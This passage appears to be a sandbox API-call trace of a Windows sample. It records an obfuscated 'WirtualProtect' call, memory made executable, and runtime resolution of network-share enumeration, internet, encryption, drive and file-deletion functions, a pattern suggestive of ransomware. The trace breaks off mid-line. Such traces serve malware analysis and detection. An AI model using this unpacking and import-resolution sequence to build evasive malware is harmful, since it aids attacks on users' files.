iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.958] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.959] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.960] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.960] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.960] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.960] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.960] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.960] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.960] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.960] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.960] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.960] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.960] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0111.960] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0116.625] lstrcatA (in: lpString1="", lpString2="WirtualProtect" | out: lpString1="WirtualProtect") returned="WirtualProtect" [0116.625] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0116.625] VirtualProtect (in: lpAddress=0x220020, dwSize=0x90d68, flNewProtect=0x40, lpflOldProtect=0x18f614 | out: lpflOldProtect=0x18f614*=0x4) returned 1 [0116.683] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0116.683] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0116.683] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0116.683] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0116.683] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0116.683] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0116.684] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0116.684] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0116.684] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0116.688] Module32First (hSnapshot=0x58, lpme=0x18f3a8) returned 1 [0116.691] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x3040000 [0116.730] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0116.730] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0116.730] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0116.730] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0116.730] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0116.730] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0116.730] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0116.730] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0116.730] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0116.730] SetErrorMode (uMode=0x400) returned 0x0 [0116.730] SetErrorMode (uMode=0x0) returned 0x400 [0116.730] GetVersionExA (in: lpVersionInformation=0x18e2d8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e2d8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0116.730] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x49f0000 [0116.748] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18f360 | out: lpflOldProtect=0x18f360*=0x2) returned 1 [0116.809] VirtualFree (lpAddress=0x49f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0116.818] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0116.818] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0116.818] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0116.818] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringW") returned 0x76b31ee5 [0116.818] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0116.818] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0116.818] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x75640000 [0116.834] GetProcAddress (hModule=0x75640000, lpProcName="WNetOpenEnumW") returned 0x75642f06 [0116.834] GetProcAddress (hModule=0x75640000, lpProcName="WNetEnumResourceW") returned 0x75643058 [0116.834] GetProcAddress (hModule=0x75640000, lpProcName="WNetCloseEnum") returned 0x75642dd6 [0116.834] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0116.854] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0116.854] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0116.854] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0116.854] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0116.855] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0116.855] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0116.855] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0116.855] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75600000 [0116.862] GetProcAddress (hModule=0x75600000, lpProcName="timeGetTime") returned 0x756026e0 [0116.862] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0116.862] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0116.862] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0116.862] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0116.863] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0116.863] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0116.863] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0116.863] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0116.863] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0116.863] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0116.863] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0116.863] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0116.863] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0116.864] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0116.864] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0116.864] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0116.864] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0116.864] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0116.864] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0116.864] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0116.864] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0116.864] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0116.865] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0116.865] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0116.865] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0116.865] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0116.865] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0116.865] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0116.865] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0116.865] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0116.865] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0116.866] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0116.866] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0116.866] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0116.866] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0116.866] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0116.866] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0116.866] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0116.866] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0116.866] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0116.867] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0116.867] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0116.867] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0116.867] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0116.867] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0116.867] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0116.867] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0116.867] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0116.867] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0116.868] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0116.868] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0116.868] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0116.868] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0116.868] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0116.868] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0116.868] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0116.868] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0116.868] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0116.868] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0116.869] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0116.869] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0116.869] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0116.869] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0116.869] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0116.869] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0116.869] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0116.869] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0116.869] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0116.870] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0116.870] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0116.870] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0116.870] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0116.870] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0116.870] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0116.870] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0116.870] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0116.870] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0116.871] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0116.871] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0116.871] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0116.871] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0116.871] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0116.871] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0116.871] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0116.871] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0116.871] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0116.871] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0116.872] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0116.872] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0116.872] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0116.872] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0116.872] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0116.872] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0116.872] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0116.872] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0116.872] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0116.873] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0116.873] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0116.873] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0116.873] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0116.873] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0116.873] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0116.873] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0116.873] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0116.873] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0116.874] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0116.874] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0116.874] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0116.874] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0116.874] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0116.874] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0116.874] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0116.874] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0116.874] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0116.875] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0116.875] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0116.875] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0116.875] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0116.875] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0116.875] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0116.875] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0116.875] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0116.875] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0116.876] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0116.876] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0116.876] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0116.876] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0116.876] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0116.876] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0116.876] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0116.876] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0116.877] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0116.878] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0116.878] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0116.878] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0116.878] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0116.879] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0116.879] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0116.879] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0116.879] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0116.879] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0116.879] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0116.879] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0116.879] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0116.879] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0116.880] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0116.880] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0116.880] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0116.880] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0116.880] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0116.880] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0116.880] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0116.880] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0116.880] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0116.880] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0116.881] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0116.881] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0116.881] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0116.881] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0116.881] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0116.881] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0116.881] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0116.881] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0116.882] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0116.882] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0116.882] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0116.882] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0116.882] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0116.882] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0116.882] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0116.882] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0116.882] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0116.882] GetProcAddress 